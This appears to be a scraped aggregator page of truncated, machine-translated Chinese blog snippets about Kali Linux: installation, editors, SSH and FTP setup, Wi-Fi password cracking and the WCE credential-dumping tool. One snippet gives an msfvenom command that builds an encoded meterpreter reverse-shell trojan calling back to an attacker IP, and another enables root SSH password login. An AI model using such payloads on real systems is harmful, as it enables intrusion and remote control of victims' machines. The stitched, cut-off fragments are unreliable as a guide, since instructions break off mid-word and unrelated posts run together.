Recently changed from Ubuntu to Kali, indeed there are too many inconvenient!For example, sublime text 3 is not installed, there are a variety of small problems. It is estimated that you should make a good Kali before using Kali.Find a good editor on Kali today and discover the bluefish.Here is a brief introduction, how to configure the Bluefish working browser.F
WCEWindows identity authentication Process
Http://wenku.baidu.com/view/cf2ee127a5e9856a56126017.html
#特例在登陆的目标服务器/System, there is a W digest security package that caches a plaintext password locally and is deleted when logging off
WCE (WINDOWS credential EDITOR)
Windows Credentials Editor (WCE) "Windows Authentication Information editor" is a powerful intranet penetration tool for Windows platforms.
Role: It can enumerate login sessions, and can add, cha
UEFI installed Kali Linux 1.1.0 record, uefikali
Now we use Kali Linux 1.1.0 and UEFI to start the system and use the Fcitx Pinyin input method. The dictionary is really uncomfortable and I will write it.
Address: http://www.cnblogs.com/go2bed/p/4295466.html
Hardware Overview: ThinkPad, intel, GB mechanical hard drive, Linux partition mounted: // home swap three.
_____________
0x00
First, I tried to
Recently in the security testing, firmware reverse and port scanning need Kali, need to Kali and operating PC transfer files, just know Kali belong to Debian, also began to familiar with VSFTPDFor the most convenient use, the configuration of an anonymous user can also access the VSFTP, is also equipped with a long time, finally succeeded, three steps away!1, ins
Guide
Pentbox is a security suite that contains a number of tools that make penetration testing work easy to process. It is written in Ruby and targets Gnu/linux, and it also supports Windows, MacOS, and any other system that has Ruby installed. In this short article we will explain how to set up a honeypot in the Kali Linux environment.
If you don't know what a honeypot is (Honeypot), a honeypot is a computer security mechanism that i
Kali Linux Infiltration Basics finishing Series article reviewVulnerability scanning
Network traffic
Nmap
Hping3
Nessus
Whatweb
Dirbuster
Joomscan
Wpscan
Network trafficNetwork traffic is the amount of data transmitted over the network.TCP protocolTCP is the Transport layer protocol in the Internet, using three-time handshake protocols to establish a connection. When the active party sends a
Because joined the network security laboratory needs to learn Kali Linux, looked at a lot of online teaching materials and video, a cursory look at the discovery of resources compared to a system of learning process leads to low learning efficiency, not to achieve expectations.So have the idea of blogging, one can be used in the future when you need to query the use of the appropriate infiltration tools, do not have to spend a lot of time to re-study;
Kali has always been my love, tell me about the problems I've met.First: Font overlapGnome-tweak-tool --open toolA second SSHTo modify the Sshd_config file, the command is:Vi/etc/ssh/sshd_configRemove the comment for #passwordauthentication No and modify No to Yes//kali default YesModify Permitrootlogin Without-password to permitrootlogin YesSave exitThe command to start the SSH service is:/etc/init.d/ssh
The first step is to download the JDK, and eclipse I will not be in the detail/official website of the download. (Remember to download the corresponding version of your own!)
There's a problem with Kali Linux, and it's a problem that has been bothering everyone--kali Linux comes with Java, but the JDK version is 1.6. And eclipse requires JDK version 1.8 or more. Many people will not uninstall Jdk1.6,ecli
First use the already installed VMware virtual machine Click to create a new virtual machine, using the Kali Linux image, according to the actual situation to choose the version you want to download, I downloaded the Kali Linux a Bit ISOAfter we choose, click Next. Select the location of the mirror after the virtual machine is named.Click Next.Click Done.To configure the network process, the hostname defaul
the need to be used in the process of cracking, Kali operating system and a power-to-external wireless card and cracked dictionaries.I used here is a virtual machine on the Kali and an external wireless network card, the next door to set the wireless password is too simple, caught the handshake after the dictionary run a minute more run out of the password, good luck. don't say much nonsense, next look at
In section 1.1, we have a general idea of the built-in toolset for Kali Linux, which focuses on system installation under virtual machines.
If you need to customize or otherwise install the system, please refer to the official documentation, http://cn.docs.kali.org/. The official documentation is roughly as follows:
Kalilinux official documents (1)
Kali Linux Official documents (2)
1.2.1 Download im
1. Copy the Linux system folder to the virtual machine
2. Replication completed
3. Open the Linux system file and right-click in the folder and open it in the terminal.
4. Open Terminal
5. Input Decompression Command TAR-JXVF rt3070linuxv2.5.0.3.bz2Root@kali:~/documents/linux System # lsrt3070linuxv2.5.0.3.bz2Root@kali:~/documents/linux System # TAR-JXVF RT3070LINUXV2.5.0.3.BZ22011_0719_rt3070_rt3370_rt
Preparation Tools
1. Kali System IP 10.10.10.131
2, victim system IP 10.10.10.133
Steps:
1. Trojan Control Program
root@kali:~# msfvenom-p windows/meterpreter/reverse_tcp-e x86/shikata_ga_nai-i 5-b ' \x00 ' LHOST=10.10.10.131 LPORT=44 3-f exe > Abc.exe
No platform was selected, choosing Msf::module::P latform::windows from the payload
No Arch selected, selecting Arch:x86 from the payload
Found 1 Compatibl
Tags: security+ Vulnerability Information SecurityKali version update-----first rolling releaseKali 2.0 announced that it will be updated with rolling release mode (but not implemented)Fixed-releaseFixed release cycleUse the mainstream version of software stabilizationRelease-----Mainstream-----voidMore stable, suitable for enterprise production environmentRolling releaseUsed by developers and techniciansContinuously upgrade new version, the pursuit of new features after the fastest useis becomi
Tools and Raw Materials
1. Virtual Machine: Oracle VM virtualbox
: Https://www.virtualbox.org/wiki/Downloads
Download from your computer's operating system. If the host is a 32-bit x86 version, download the 64-bit x64 version.
2. ISO document: kali-linux-1.0.6-amd64.iso
: Http://www.kali.org/downloads/
Procedure
1. Create a VM
After installing the software, click New in the upper left corner. Many versions are released in the Linux World, and
Kali Linux 2.0: After installation, kalilinux1. Add an official software library
1) edit/etc/apt/sources. list
leafpad /etc/apt/sources.list
2) use # To comment out the original content and add the following content:
# Regular repositoriesdeb http://http.kali.org/kali sana main non-free contribdeb http://security.kali.org/kali-security sana/updates main contrib n
Kali linux 2.0 implements scientific Internet access through host machine proxy
One of the biggest problems with using kali linux is that it cannot smoothly download and update resources from the official resource library.
Now in China, the solution is to first find other unofficial update sources, then download the updates, and then install openvpn (2.0 has been installed by default), and then scientifical
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.